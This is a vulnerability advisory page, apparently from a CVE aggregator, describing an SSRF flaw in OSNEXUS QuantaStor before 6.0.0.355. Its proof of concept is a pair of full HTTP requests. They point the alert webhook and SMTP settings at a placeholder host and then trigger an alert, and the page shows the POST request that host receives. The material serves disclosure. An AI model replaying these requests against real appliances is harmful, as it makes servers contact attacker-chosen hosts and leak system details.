SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Description
An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.
POC
Step 1: Prepare the SSRF with a request like this:
GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1
Host: <HOSTNAME> Accept-Encoding: gzip, deflate
Accept: */* Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json
Content-Length: 0
Step 2: Trigger this alert with this request
GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: <HOSTNAME> Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json
Content-Length: 1
The post request received by <TARGET> looks like this: {
Python
FLASK stuff
####
'endpoint': 'index',
'method': 'POST',
'cookies': ImmutableMultiDict([]),
END
Python FLASK stuff
####
'data': b'{ "attachments": [ {
"fallback": "[122] test / test.",
"color": "#aa2222",
"title": "[122] test",
"text": "test",
"fields": [ {
"title": "Alert Severity",
"value": "CRITICAL",
"short": false }, { "title": "Appliance", "value": "quantastor (https://<HOSTNAME>)",
"short": true
}, {
"title": "System / Driver / Kernel Ver",
"value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
"short": false
}, {
"title": "System Startup",
"value": "Fri Aug 6 16-02-55 2021",
"short": true
}, {
"title": "SSID",
"value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
"short": true
}, ],
"footer": "QuantaStor Call-home Alert",
"footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
"ts": 1628461774 } ], "mrkdwn":true }',
FLASK
REQUEST STUFF #####
'headers': {
'Host': '<redacted>', 'User-Agent': 'curl/7.58.0', 'Accept': '*/*', 'Content-Type': 'application/json', 'Content-Length': '790'
}, 'args': ImmutableMultiDict([]), 'form': ImmutableMultiDict([]), 'remote_addr': '217.103.63.173', 'path': '/payload/58', 'whois_ip': 'TNF-AS, NL' }
END
FLASK REQUEST STUFF #####
Affected products
1- Range: 0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
4- cisrt.divd.nl/DIVD-2021-00020/mitrethird-party-advisoryexploittechnical-description
- csirt.divd.nl/CVE-2021-42079mitrethird-party-advisory
- www.wbsec.nl/osnexusmitrethird-party-advisorytechnical-description
- www.osnexus.com/products/software-defined-storagemitreproduct
News mentions
0No linked articles in our index yet.